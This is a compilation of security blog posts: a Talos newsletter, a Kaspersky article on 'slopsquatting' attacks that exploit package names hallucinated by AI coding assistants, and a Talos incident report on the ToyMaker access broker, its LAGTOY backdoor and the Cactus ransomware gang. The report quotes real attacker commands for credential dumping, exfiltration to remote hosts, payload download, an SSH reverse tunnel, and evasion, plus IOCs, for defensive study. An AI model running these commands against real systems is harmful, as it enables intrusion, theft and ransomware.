Welcome to this week’s edition of the Threat Source newsletter. 

“Be curious, not judgmental,” Ted Lasso says, misattributing Walt Whitman. We forgive Ted because… well, he’s Ted Lasso. 

If you’ve not watched the first season of Ted Lasso, there is a defining moment where Ted confronts a nefarious bully. While putting him in his place with kindness and skill, Ted refers to this quote. It’s a defining moment not only for Ted but for the secondary and tertiary characters in the scene. One of the questions that I’m asked most when public speaking is “How do I get into Talos?” For people considering a new career, it’s “How do I get into cybersecurity?” To all those questions, my answer is “Be curious, not judgmental.” 

I think there is no greater skill necessary in security than intellectual curiosity. If you have that, you can learn the rest. The hiring process to get in the door at Talos is extremely challenging and the candidates are incredible. That’s why when I interview candidates for various roles in Talos I rarely, if ever, fixate on a niche skillset, instead focusing on the prospective employee’s intellectual curiosity. I ask weird questions that don’t seem related to the specific job role, not in an effort to throw them off but simply because I am curious and hope that they are as well.  

Do you like to read? Do you ever read books outside of your normal wheelhouse? What are some favorite fiction and non-fiction books? Do you have a favorite craft or hobby? How many different Linux distributions have you installed? What are your 5 favorite board games? Do you play video games, and if so, what are a few favorites from each platform and decade?   

These kinds of questions help me identify what kind of innate curiosity that the prospective candidate possesses and from their answers we will invariably fall down a rabbit hole while my co-workers shake their heads at me in disdain.  

Beyond that, I always listen for my favorite answer: “I don’t know, but…” There’s no better answer to a very difficult question than “I don’t know, but I’d probably try X,” or “I don’t know, but I’d love to learn…” 

Barbecue sauce.

The one big thing 

Cisco Talos has released a blog post on the initial access broker (IAB) we call “ToyMaker” — a financially-motivated threat actor. They deploy their custom-made backdoor we call “LAGTOY” and extract credentials from the victim enterprise. LAGTOY can be used to create reverse shells and execute commands on infected endpoints. 

Why do I care? 

A compromise by LAGTOY may result in access handover to a secondary threat actor. Specifically, we’ve observed ToyMaker hand over access to Cactus, a double extortion gang who employed their own tactics, techniques and procedures (TTPs) to carry out malicious actions across the victim’s network. Our blog details a timeline with turnaround time from ToyMaker to Cactus. 

So now what?

Cisco Talos has released information to help ensure protection including techniques and related IOCs. Check out the blog post for full details.

Top security headlines of the week 

Apple says zero-day bugs exploited against ‘specific targeted individuals’ using iOS. Apple has released new software updates across its product line to fix two security vulnerabilities, which the company said may have been actively used to hack customers running its mobile software, iOS. (TechCrunch)

Microsoft purges millions of cloud tenants in the wake of Storm-0558. In an effort to thwart state-sponsored activity stemming from preventable security issues, Microsoft is making significant efforts to purge inactive Azure cloud tenants and take comprehensive inventory of cloud and network assets. (DarkReading) 

Researchers warn of critical flaw found in Erlang OTP SSH. The vulnerability could allow unauthenticated attackers to gain full access to a device. Many of these devices are widely used in IoT and telecom platforms. (cybersecuritydrive) 

CISA flags actively exploited vulnerability in SonicWall SMA devices. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a security flaw impacting SonicWall Secure Mobile Access 100 Series gateways to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. (The Hacker News)

Can’t get enough Talos? 

• Talos Takes: Year in Review Special: Part 3 
• TL,DR: Attacks on identity, and Multi Factor Authentication 
• Unmasking the new XorDDoS controller and infrastructure

Upcoming events where you can find Talos 

• RSA (Apr. 28 – May 1) San Francisco, CA 
• PIVOTcon (May 7 – 9) Malaga, Spain 
• CTA TIPS 2025 (May 14 – 15)
 Arlington, VA 
• Cisco Connect UK & Ireland (May 20) London, UK 
• BotConf (May 20 – 23) Angers, France 
• Cisco Live U.S. (June 8 – 12) San Diego, CA

Most prevalent malware files from Talos telemetry over the past week  

SHA256: 2462569cf24a5a1e313390fa3c52ed05c7f36ef759c4c8f5194348deca022277  
MD5: 42c016ce22ab7360fb7bc7def3a17b04  
VirusTotal: https://www.virustotal.com/gui/file/2462569cf24a5a1e313390fa3c52ed05c7f36ef759c4c8f5194348deca022277  
Typical Filename: Rainmeter-4.5.22.exe   
Detection Name: Artemis!Trojan  

SHA 256:7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5    
MD5: ff1b6bb151cf9f671c929a4cbdb64d86    
VirusTotal : https://www.virustotal.com/gui/file/7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5  
Typical Filename: endpoint.query      
Detection Name: W32.File.MalParent    

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f    
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
Typical Filename: VID001.exe    
Detection Name: Win.Worm.Bitmin-9847045-0  

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
MD5: 7bdbd180c081fa63ca94f9c22c457376    
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91   
Typical Filename: IMG001.exe   
Detection Name: Win.Trojan.Miner-9835871-0 

Cisco Talos Blog – ​Read More

AI-generated code is already widespread — by some estimates around 40% of new code this past year was written by AI. Microsoft CTO Kevin Scott predicts that in five years this figure will hit 95%. How to properly maintain and protect such code is a burning issue.

Experts still rate the security of AI code as low, as it’s teeming with all the classic coding flaws: vulnerabilities (SQL injections, embedded tokens and secrets, insecure deserialization, XSS), logical defects, outdated APIs, insecure encryption and hashing algorithms, no handling of errors and incorrect user input, and much more. But using an AI assistant in software development adds another unexpected problem: hallucinations. A new study examines in detail how large language models (LLMs) create hallucinations that pop up in AI code. It turns out that some third-party libraries called by AI code simply don’t exist.

Fictitious dependencies in open-source and commercial LLMs

To study the phenomenon of phantom libraries, the researchers prompted 16 popular LLMs to generate 576,000 Python and JavaScript code samples. The models showed varying degrees of imagination: GPT4 and GPT4 Turbo hallucinated the least (fabricated libraries were seen in less than 5% of the code samples); next came DeepSeek models (more than 15%); while CodeLlama 7B was the most fantasy-prone (more than 25%). What’s more, even the parameters used in LLMs to control randomness (temperature, top-p, top-k) are unable to reduce the hallucination rate to insignificant values.

Python code contained fewer fictitious dependencies (16%) than JavaScript (21%). Age is also a contributing factor. Generating code using packages, technologies and algorithms that started trending only this past year results in 10% more non-existent packages.

But the most dangerous aspect of phantom packages is that their names aren’t random, and neural networks reference the same libraries over and over again. That was demonstrated by stage two of the experiment, in which the researchers selected 500 prompts that had provoked hallucinations, and re-ran each of them 10 times. This revealed that 43% of hallucinated packages crop up during each code generation run.

Also of interest is the naming of hallucinated packages: 13% were typical “typos” that differed from the real package name by only one character; 9% of package names were borrowed from another development language (Python code, npm packages); and a further 38% were logically named but differed more significantly from the real package names.

Meet slopsquatting

All of the can provoke a new generation of attacks on open-source repositories, which has already been dubbed “slopsquatting” by analogy with typosquatting. In this case, squatting is made possible not by names with typos, but by names from AI slop (low-quality output). Because AI-generated code repeats package names, attackers can run popular models, find recurring hallucinated package names in the generated code, and publish real — and malicious — libraries with these same names. If someone mindlessly installs all packages referenced in the AI-generated code, or the AI assistant installs the packages by itself, a malicious dependency gets injected into the compiled application, exposing the supply chain to a full-blown attack (ATT&CK T1195.001). This risk is set to rise significantly with the advance of vibe coding — where the programmer writes code by giving instructions to AI with barely a glance at the actual code produced.

Given that all major open-source repositories have been hit by dozens of malicious packages this past year (1, 2), and close to 20,000 malicious libraries have been discovered in the same time period, we can be sure that someone out there will try to conveyorize this new type of attack. This scenario is especially dangerous for amateur programmers, as well as for corporate IT departments that solve some automation tasks internally.

How to stop slopsquatting and use AI safely

Guidelines on the safe implementation of AI in development already exist (for example, OWASP, NIST and our own), but these tend to describe a very broad range of measures, many of which are long and complicated to implement. Therefore, we’ve compiled a small subset of easy-to-implement measures to address the specific problem of hallucinated packets:

• Make source-code scanning and static security testing part of the development pipeline. All code, including AI-generated, must meet clear criteria are: no embedded tokens or other secrets; use of correct versions of libraries and other dependencies, and so forth. These tasks are well integrated into the CI/CD cycle — for example, with the help of our Kaspersky Container Security.
• Introduce additional AI validation cycles where the LLM checks its own code for errors, to reduce the number of hallucinations. In addition, the model can be prompted to analyze the popularity and usability of each package referenced in a project. Using a prebuilt database of popular libraries to fine-tune the model and allow retrieval-augmented generation (RAG) also reduces the number of errors. By combining all these methods, the authors of the study were able to cut the number of hallucinated packages to 2.4% for DeepSeek and 9.3% for CodeLlama. Unfortunately, both figures are too far off zero for these measures to suffice.
• Ban the use of AI assistants in coding critical and trusted components. For non-critical tasks where AI-assisted coding is allowed, assign a component developer to build a code review process. For the review, there needs to be a checklist tailored to AI code.
• Draw up a fixed list of trusted dependencies. AI assistants and their flesh-and-blood users must have limited scope to add libraries and dependencies to the code — ideally, only libraries from the organization’s internal repository, tested and approved in advance, should be available.
• Train developers. They must be well versed in AI security in general, as well as in the context of AI use in code development.

Kaspersky official blog – ​Read More

• In 2023, Cisco Talos discovered an extensive compromise in a critical infrastructure enterprise consisting of a combination of threat actors.
• From initial access to double extortion, these actors slowly and steadily compromised a multitude of hosts in the network using a combination of various dual-use remote administration, SSH and file transfer tools. 
• The Initial Access Broker (IAB), whom Talos calls “ToyMaker” and assesses with medium confidence is a financially motivated threat actor, exploits vulnerable systems exposed to the internet. They deploy their custom-made backdoor we call “LAGTOY” and extract credentials from the victim enterprise. LAGTOY can be used to create reverse shells and execute commands on infected endpoints.
• A compromise by LAGTOY may result in access handover to a secondary threat actor. Specifically, we’ve observed ToyMaker handover access to Cactus, a double extortion gang who employed their own tactics, techniques and procedures (TTPs) to carry out malicious actions across the victim’s network.

---

Turnaround time from ToyMaker to Cactus

Intrusion analysis across various endpoints enabled Talos to build a timeline of events from initial compromise to access handover to subsequent secondary malicious activity. The following is a high-level timeline of events:

Day of activity	Type of malicious activity	Threat actor
Initial compromise	User enumeration Preliminary recon Fake user creation Credential extraction via Magnet RAM Capture	ToyMaker
+2 day(s)	Deploy LAGTOY implant	ToyMaker
Lull in activity for 3 weeks
+3 weeks aka Cactus day 0	Endpoint enumeration	Cactus
Cactus day 2	Server and file enumeration Indicator removal	Cactus
Cactus day 2 and 3	Proliferation through enterprise	Cactus
Cactus day 4	Archiving sensitive data for exfiltration – extortion	Cactus
Cactus day 8	Remote management tools deployment: eHorus, RMS, AnyDesk OpenSSH connections	Cactus
Cactus day 12	Malicious account creations for ransomware deployment	Cactus
Cactus day 12	Delete volume shadow copies Boot recovery modifications	Cactus

ToyMaker’s TTPs and tools

After the initial compromise, ToyMaker performed preliminary reconnaissance, credential extraction and backdoor deployment within the span of a week, after which they took no further activity. Talos did not observe any victim-specific data exfiltration nor did we observe attempts to discover and pivot to other valuable endpoints. After a lull in activity of approximately three weeks, we observed the Cactus ransomware group make its way into the victim enterprise using credentials stolen by ToyMaker. Based on the relatively short dwell time, the lack of data theft and the subsequent handover to Cactus, it is unlikely that ToyMaker had any espionage-motivated ambitions or goals.

Talos therefore assesses with medium confidence that ToyMaker is a financially-motivated Initial Access Broker (IAB) who acquires access to high value organizations and then transfers that access to secondary threat actors who usually monetize the access via double extortion and ransomware deployment.

The disparity in TTPs and timelines between the initial access conducted by ToyMaker and the secondary activity conducted by Cactus requires that both threats be modeled separately. However, it is imperative to establish relationships between the two. In fact, similar connections need to be incorporated into paradigms used for threat modeling any suspected IABs. In subsequent blogs, Talos will propose a new methodology for modeling and tracking compartmentalized and yet somewhat connected threats.

ToyMaker has been known to use a custom malware family — a backdoor Talos tracks as LAGTOY. ToyMaker usually infiltrates an organization’s environment by successfully exploiting a known vulnerability in an unpatched internet-facing server. Successful compromise almost immediately results in rapid reconnaissance of the system:

COMMAND	INTENT
whoami net user net localgroup net group net user Administrator nltest /domain_trusts net group Enterprise Admins	System Information Discovery [T1082]
ipconfig /all	Gather Victim Network Information [T1590]

Reconnaissance is followed by the creation of a fake user account named ‘support’:

COMMAND	INTENT
net user support Sup0rtadmin /add net localgroup administrators support /add	Create Account [T1136]

Following this, the actor starts an SSH listener on the endpoint using the Windows OpenSSH package (sshd.exe). The endpoint then receives a connection from another infected host on the network that creates a binary named ‘sftp-server.exe’ which is the SFTP server module of OpenSSH. sftp-server.exe then connects to a remote host to download the Magnet RAM Capture executable:

COMMAND	INTENT
MRCv120.exe /accepteula /silent /go	extract credentials [T1003]

Magnet RAM Capture is a freely available forensics tool used to obtain a memory dump of the host, from which credentials can be harvested. This tactic likely explains the high number of compromised systems that Talos identified during this campaign. 

The memory dump is then archived using the 7za.exe archive creation command [T1560]:

7za.exe a -p -mmt2 -mhe 1.7z 1.r

Subsequently the archive is exfiltrated from the endpoint using PuTTY’s SCP utility (pscp) [T1048]:

pscp.exe-P 53 1.7z root@<Remote_IP>:/root

Once the attackers have obtained the memory dump, they use the sftp-server.exe connection again to download and execute a custom made reverse shell implant we’re calling “LAGTOY”.

LAGTOY is persisted on the system by creating a service for it [T1543]:

sc create WmiPrvSV start= auto error= ignore binPath= C:Program FilesCommon FilesServicesWmiPrvSV.exe

The implant reaches out to the C2 server configured in it to receive commands to execute on the endpoint such as:

COMMAND	INTENT
tasklist	System Information Discovery [T1082]
quser	System Information Discovery [T1082]
ipconfig /all	System Information Discovery [T1082]

LAGTOY – ToyMaker’s staple backdoor

LAGTOY is a simple yet effective implant. The backdoor is called HOLERUN by Mandiant. It is meant to periodically reach out to the hard-coded C2 server and accept commands to execute on the infected endpoint. It is installed on the system as part of a service and contains rudimentary anti-debugging checks before initiating connections to the C2.

As an anti-debug technique, the malware registers a custom unhandled exception filter using the kernel32!SetUnhandledExceptionFilter(). If the malware is running under a debugger, the custom filter won’t be called and the exception will be passed to the debugger. Therefore, if the unhandled exception filter is registered and the control is passed to it, then the process is not running with a debugger.

LAGTOY is intended to run on the infected system as a service with the name ‘WmiPrvSV’. 

Both the C2 IP address and the protocol port are hardcoded into LAGTOY.  The communication is done over port 443 with a raw socket — not using TLS as one would expect on this TCP port.

The C2 will send specific administration codes to LAGTOY:

• ‘#pt’ : Stop service.
• ‘#pd’: Break from the current execution chain and check if the service has been stopped. If stopped then Sleep for a specific time period and re-initiate connection to the C2.
• ‘#ps’: Simply create the process/command specific.
• If the code doesn’t begin with ‘#’ then simply execute the provided command or process name on the endpoint.

Compared with the sample discovered in 2022 by Mandiant, this sample added the ‘#ps’ handler for creating process for command. 

Time-based execution 

LAGTOY uses a unique time-based logic to decide whether it needs to execute commands or Sleep for a specific time period. Talos assesses with high confidence that this logic is a novel custom built unique to the LAGTOY family of implants.

LAGTOY is able to process three commands from the C2 with a Sleep interval of 11000 milliseconds between them. During its beaconing cycle it will record the last successful time of C2 communications and successful command execution. If the commands issued by the C2 have been failing for at least 30 minutes then the implant will send a message to the C2 informing it of the failure to execute commands.

LAGTOY has a watchdog routine embedded. If it has been running for a cumulative time of more than 60 minutes, it will stop executing commands and then check if the service has been stopped. If the service is still active then the implant will reinitiate connections to the C2.

ToyMaker gives way to ransomware cartels

Almost a month after ToyMaker established access to the victim enterprise, the actor passed on the access to a secondary threat actor, a Cactus ransomware affiliate, who primarily conducts ransomware and double extortion operations.

The Cactus gang conducted their own reconnaissance and persistence, deploying their own set of malware instead of using LAGTOY as a vehicle into the enterprise. Furthermore, they initially accessed the compromised endpoint using compromised user credentials obtained earlier by ToyMaker using the Magnet RAM Capture tool.

Initial recon and network scans

Cactus immediately began conducting network scans to identify systems of interest and proliferation. To spread across the network, they first ran a WSMAN discovery script to enumerate all endpoints configured to handle PowerShell remoting.

COMMAND	INTENT
C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy Bypass -File .fs.ps1 result.csv	Remote System Discovery [T1018]
C:PerfLogsAdmin7z.exe a -p<password> pss.7z .result.csv C:PerfLogsAdmincurl.exe -k -T .pss.7z hxxps[:]//<remote_ip>:8443 C:PerfLogsAdmin7z.exe a -p<pwd> .CP-SERVER3.7z .CP-SERVER3.txt C:PerfLogsAdmin7z.exe a -p<pwd> .FILEN01.7z .FILEN01.txt C:PerfLogsAdmincurl[.]exe -k -T .CP-SERVER3.7z hxxps[://]<remote_ip>:8443 C:PerfLogsAdmincurl[.]exe -p -k -T .FILEN01.7z hxxps[://]<remote_ip>:8443 C:PerfLogsAdmin7z[.]exe a -p<pwd> .FILE-SERVER.7z .FILE-SERVER[.]txt C:PerfLogsAdmincurl[.]exe -k -T .FILE-SERVER.7z hxxps[://]<remote_ip>:8443	Results are then compressed and sent to a remote server. The same is done for other information. Data exfiltration [T1048]

Once the attackers had obtained the information they would clean up traces of their access:

COMMAND	INTENT
C:Windowssystem32reg.exe delete HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerRunMRU /f	Indicator Removal: Clear Command History [T1070]
C:Windowssystem32reg.exe delete HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault /va /f C:Windowssystem32reg.exe delete HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers /f C:Windowssystem32reg.exe add HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers C:Windowssystem32attrib.exe %userprofile%documentsDefault.rdp -s -h	Indicator Removal: Clear Network Connection History and Configurations [T1070]
net user support /delete	Indicator Removal: Clear Persistence[T1070]

Data Exfiltration

The harvested credentials provided ToyMaker access to a multitude of systems, on which the threat actor performed reconnaissance for valuable information. These files were either archived and then exfiltrated using multiple dual-use tools such as 7zip and curl or extracted directly using file transfer utilities such as WinSCP [T1560, T1048]:

C:PerfLogsAdmin7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p -xr!.ipa -xr!.apk -xr!.zip -xr!.rar -xr!.iso -xr!.dll -xr!.dl_ -xr!.lib -xr!.exe -xr!.ex_ -xr!.lnk -xr!.pdb -xr!.cab -xr!.msp -xr!.bak -xr!.old -xr!.bmp -xr!.gif -xr!.jpg -xr!.png -xr!.avi -xr!.m4v -xr!.mp4 -xr!.mp3 -xr!.wmv -xr!.wav -xr!.mov -xr!.mkv -xr!.log -xr!.csv -xr!*.jar -xr!test -xr!tests -xr!jdk8 e:tmp<filename>

C:PerfLogsAdmin7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p<password> -xr!*.ipa -xr!*.apk -xr!*.zip -xr!*.rar -xr!*.iso -xr!*.dll -xr!*.dl_ -xr!*.lib -xr!*.exe -xr!*.ex_ -xr!*.lnk -xr!*.pdb -xr!*.cab -xr!*.msp -xr!*.bak -xr!*.old -xr!*.bmp -xr!*.gif -xr!*.jpg -xr!*.png -xr!*.avi -xr!*.m4v -xr!*.mp4 -xr!*.mp3 -xr!*.wmv -xr!*.wav -xr!*.mov -xr!*.mkv -xr!*.log -xr!*.csv -xr!*.jar -xr!test -xr!tests -xr!jdk8 e:tmp<filename>

On other endpoints the attackers discovered and archived what is believed to be the victim’s customer data for exfiltration as well [T1560, T1048]:

C:Windowssystem32cmd.exe /c <path>7z.exe a -t7z -mx0 -ssp -spf -v5g -y -r -mhe=on <path>001.7z <path>Private FolderCustomers<path> -p<password>

The use of remote administration tools

Cactus used a variety of remote admin tools on different endpoints to maintain long-term access. The tools included:

• eHorus Agent: Remote control software also known as Pandora RC
• AnyDesk: Remote Desktop application
• Remote Utilities for Windows Admin (RMS Remote Admin): A Russian made remote management tool/platform
• OpenSSH: SSH package included and available for installation with the Windows OS

The remote administration utilities were downloaded from remote, attacker controlled locations via Powershell and Impacket:

COMMANDS from Impacket	INTENT
cmd.exe /Q /c powershell iwr -Uri http://<remote_IP>:7423/file.msi -OutFile C:Programdataf.msi 1> \127.0.0.1ADMIN$__<random> 2>&1	Stage Capabilities: Upload Malware [T1608]
cmd.exe /Q /c msiexec.exe /i C:Programdataf.msi /q EHUSER=<username> STARTEHORUSSERVICE=1 DESKTOPSHORTCUT=0 1> \127.0.0.1ADMIN$__<random> 2>&1	System Binary Proxy Execution: Msiexec [T1218]

In another instance, the attackers created reverse shells using OpenSSH, where a scheduled task was created to connect to the C2 server on an hourly basis to accept and execute commands:

COMMAND	INTENT
SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c c:Windowstempsys_log.bat > c:Windowstemplog.txt	Scheduled Task/Job [T1053]
SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c FOR /L %N IN () DO (C:ProgramDatasshssh.exe -o “StrictHostKeyChecking no” root@<remote_ip> -p 443 -R 25369 -NCqf -i “C:Windowstempsyslog.txt” & timeout /t 15)	Scheduled Task/Job [T1053] Remote services:SSH [T1021]

Cactus ransomware group takes its operational security seriously. They remove access to the file that contains the SSH private key used to exfiltrate information. This prevents the victim from reading the key under normal circumstances. 

COMMAND	INTENT
icacls C:WindowsTempsyslog.txt icacls.exe C:Windowstempsyslog.txt /c /t /inheritance:d icacls.exe C:WindowsTempsyslog.txt /c /t /remove BUILTINAdministrators icacls.exe C:WindowsTempsyslog.txt /c /t /remove <userid> icacls.exe C:Windowstempsyslog.txt /inheritance:r /grant SYSTEM:F	File and Directory Permissions Modification: Windows File and Directory Permissions Modification [T1222] syslog.txt is the Private Key used by the threat actor for initiating SSH connection back to actor controlled infrastructure.

New user accounts

On some endpoints, the malicious operators created new unauthorized user accounts, likely to facilitate deployment of ransomware:

net user whiteninja <password> /add

reg add HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon /v LegalNoticeText /t REG_SZ /d  /f

reg add HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogon /v DefaultUserName /t REG_SZ /d whiteninja /f

reg add HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogon /v AutoLogonCount /t REG_DWORD /d 1 /f

Abusing Safe Mode for defense evasion

During our investigation, Talos found that the threat actor executed commands to reboot compromised hosts into Safe Mode with the following commands:

bcdedit /set {default} safeboot minimal
shutdown -r -f -t 0

Booting a system into Safe Mode could be motivated by the intention to disable security products due to the fact that the system loads a minimal set of drivers and services. Some security products might be inactive or limited under Safe Mode, and the threat actor could leverage this to modify registry keys or settings to disable the security products completely [T1562.001].

Metasploit injected binaries

Cactus also extensively uses Metasploit shellcode-injected copies of the Windows-based binaries Putty and ApacheBench, which is a benchmarking tool for Apache HTTP servers to execute code on the compromised systems. These will contact the same remote server used to host the portable eHorus agent, 51[.]81[.]42[.]234, over Ports 53, 443, 8343 and 9232. Cactus additionally employed ELF binaries generated by Metasploit communicating with the same remote C2 51[.]81[.]42[.]234.

Metasploit shellcode communicating with the remote server.

Coverage 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise (IOCs)

Hashes – LAGTOY

fdf977f0c20e7f42dd620db42d20c561208f85684d3c9efd12499a3549be3826

Metasploit shells

0a367cc7e7e297248fad57e27f83316b7606788db9468f59031fed811cfe4867

0bcfea4983cfc2a55a8ac339384ecd0988a470af444ea8f3b597d5fe5f6067fb

5831b09c93f305e7d0a49d4936478fac3890b97e065141f82cda9a0d75b1066d

691cc4a12fbada29d093e57bd02ca372bc10968b706c95370daeee43054f06e3

70077fde6c5fc5e4d607c75ff5312cc2fdf61ea08cae75f162d30fa7475880de

a95930ff02a0d13e4dbe603a33175dc73c0286cd53ae4a141baf99ae664f4132

c1bd624e83382668939535d47082c0a6de1981ef2194bb4272b62ecc7be1ff6b

Network IOCs

ToyMaker

209[.]141[.]43[.]37

194[.]156[.]98[.]155

158[.]247[.]211[.]51

39[.]106[.]141[.]68

47[.]117[.]165[.]166

195[.]123[.]240[.]2

75[.]127[.]0[.]235

149[.]102[.]243[.]100

Cactus

206[.]188[.]196[.]20

51[.]81[.]42[.]234

178[.]175[.]134[.]52

162[.]33[.]177[.]56

64[.]52[.]80[.]252

162[.]33[.]178[.]196

103[.]199[.]16[.]92

Cisco Talos Blog – ​Read More

For our third focussed topic for Talos’ 2024 Year in Review, we tell the story of how identity has become the pivot point for adversarial campaigns.

The main themes of this story are credential abuse, Active Directory exploits, and MFA workarounds. Valid account details was the #1 way attackers got in, and nearly half of identity attacks involved poking at AD. We also look at common MFA missteps (like no enrollment or misconfigured policies) and break down how attackers are bypassing protections with techniques like push fatigue and password spraying.

Take a look at this short but data-rich overview of identity attacks. For defenders, it may be able to help you to identify gaps in MFA implementations, understand the operational tradecraft attackers are using post-authentication, and how to align your defenses with what’s being seen in the wild.

For a 60 second overview, have a watch of this video:

For the full analysis, download Talos’ 2024 Year in Review today.

Cisco Talos Blog – ​Read More